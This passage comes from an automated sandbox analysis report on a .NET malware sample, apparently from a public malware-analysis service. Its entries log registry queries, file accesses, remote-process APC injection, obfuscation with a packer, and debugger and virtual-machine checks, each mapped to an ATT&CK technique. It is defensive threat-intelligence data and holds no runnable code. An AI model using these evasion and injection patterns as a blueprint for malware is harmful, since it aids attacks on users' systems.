\"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe.config\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Silk\\\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.INI\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\netstandard\\\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\netstandard\\v4.0_2.0.0.0__cc7b13ffcd2ddd51\\netstandard.INI\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"\\DEVICE\\NETBT_TCPIP_{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"\\DEVICE\\NETBT_TCPIP_{AC07BF4D-B150-47EB-A71E-488912826651}\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"\\Device\\RasAcd\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" touched file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\System.pdb\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" touched file \"C:\\Windows\\System.pdb\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" touched file \"C:\\Windows\\Silk.pdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-85", "type": 6, "relevance": 3, "name": "Queues an Asynchronous Procedure Call (APC) in a remote process (injection)", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"NtQueueApcThread\" (UID: 00000000-00003656)", "origin": "API Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Tries to sleep for a long time (more than two minutes)\n Matched sigs: Contains ability to retrieve type of COM object\n Matched sigs: Able to identify virtual environment by using API string", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibrary\" (Indicator: \"LoadLibrary\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"LoadLibrary\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-138", "type": 2, "relevance": 2, "name": "Contains ability to use Cryptographic classes", "description": "Found reference to \"CryptCNGInitHMAC\" (Indicator: \"HMAC\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.RandomNumberGenerator\" (Indicator: \"RandomNumberGenerator\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.AesCryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"Aes\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.AesCryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"AesCryptoServiceProvider\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.RSACng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"RSACng\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.DSACng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"DSACng\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.AesManaged, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"Aes\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.AesManaged, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"AesManaged\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.ECDiffieHellmanCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"ECDiffieHellman\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.ECDiffieHellmanCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"ECDiffieHellmanCng\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.ECDsaCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"ECDsa\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.ECDsaCng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"ECDsaCng\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA256CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA256CryptoServiceProvider\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA384\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA384\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA384CryptoServiceProvider\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512Cng, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA512\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA512\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512CryptoServiceProvider, System.Core, Version=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\" (Indicator: \"SHA512CryptoServiceProvider\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"RandomNumberGenerator\" (Indicator: \"RandomNumberGenerator\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.HashAlgorithm\" (Indicator: \"HashAlgorithm\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA256CryptoServiceProvider\" (Indicator: \"SHA256CryptoServiceProvider\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"SHA384\" (Indicator: \"SHA384\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384\" (Indicator: \"SHA384\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384Cng\" (Indicator: \"SHA384\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384CryptoServiceProvider\" (Indicator: \"SHA384\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA384CryptoServiceProvider\" (Indicator: \"SHA384CryptoServiceProvider\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"SHA512\" (Indicator: \"SHA512\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512\" (Indicator: \"SHA512\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512Cng\" (Indicator: \"SHA512\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512CryptoServiceProvider\" (Indicator: \"SHA512\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.SHA512CryptoServiceProvider\" (Indicator: \"SHA512CryptoServiceProvider\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to \"System.Security.Cryptography.HMAC\" (Indicator: \"HMAC\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-232", "type": 2, "relevance": 1, "name": "Dotnet file packed with confuser protection", "description": "Observed string: \"ConfusedByAttribute\" (Indicator: \"ConfusedByAttribute\") in Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\n Observed string: \"Confuser.Core 1.6.0+447341964f\" (Indicator: \"Confuser.Core \") in Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\n Observed string: \"ConfusedByAttribute\" (Indicator: \"ConfusedByAttribute\") in Source: 00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\n Observed string: \"Confuser.Core 1.6.0+447341964f\" (Indicator: \"Confuser.Core \") in Source: 00000000-00003656.00000001.343303.00CA2000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-338", "type": 2, "relevance": 1, "name": "Contains ability to perform Base64 encoding/decoding", "description": "Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"CheckRemoteDebuggerPresent\" (Indicator: \"CheckRemoteDebuggerPresent\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000090580c000cf94000145c6877435c6877d8f940000100000094010a00010000008cf84000935c697740837077d4a0687723f96177d8f94000010000000100000058c00c00000000005cf840008cf84000f8f8400095e1647757054900feffffffd4a068771bbe6e7500000f7700000000 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c005300a8390d001100001118640000700b0e00809c0d00b1080000aaa8640000200000b0080000580f00000d004200a2000000b1080000a1000000a1080000c9570000000000000000000036a8ffff5c00500000000000b1080000 (UID: 00000000-00003656)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-659", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using API string", "description": "Found string \"NtQuerySystemInformation\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00003656-00000C29-4369437017\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" queries volume information of \"C:\\e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" at 00000000-00003656-0000010C-4608656\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" queries volume information of \"C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\netstandard\\v4.0_2.0.0.0__cc7b13ffcd2ddd51\\netstandard.dll\" at 00000000-00003656-0000010C-5636889", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009d001b02000000000000000000000000000000000000140098001b0200000000000000000000086d0a0000000000200000000000000000000000804a0c00f8690a00186b0a00d0990c00c06e0a00000000009cf6400000000000f8f8400095e16477bf1d4900feffffffff2b68779a2a687764c51477b69f6877000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c51477d0990c0064c51477 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000074010a0000000000060000000000000050010a001a000000180b0e00000000001a0000000000000014000000000000000000000000000000000000000000000002000002809c0d006304006700000000000000000000000080000000000000009a2000ba00e40d000100000000000000020000000c000000289b0d00289b0d00239b0d00000000000000000000000a0000000001b4f02b0000000000d4f62b0095e1647787134900feffffff435c68775059687794000000a0000000229b0d00209b0d009400000058f22b00fdfed77518000000a67eb631c386d56b88032b00 (UID: 00000000-00003656)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"IsWow64Process\" with parameter \"3656\" - (UID: 00000000-00003656)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"sendMessageChannelCache\" (Indicator: 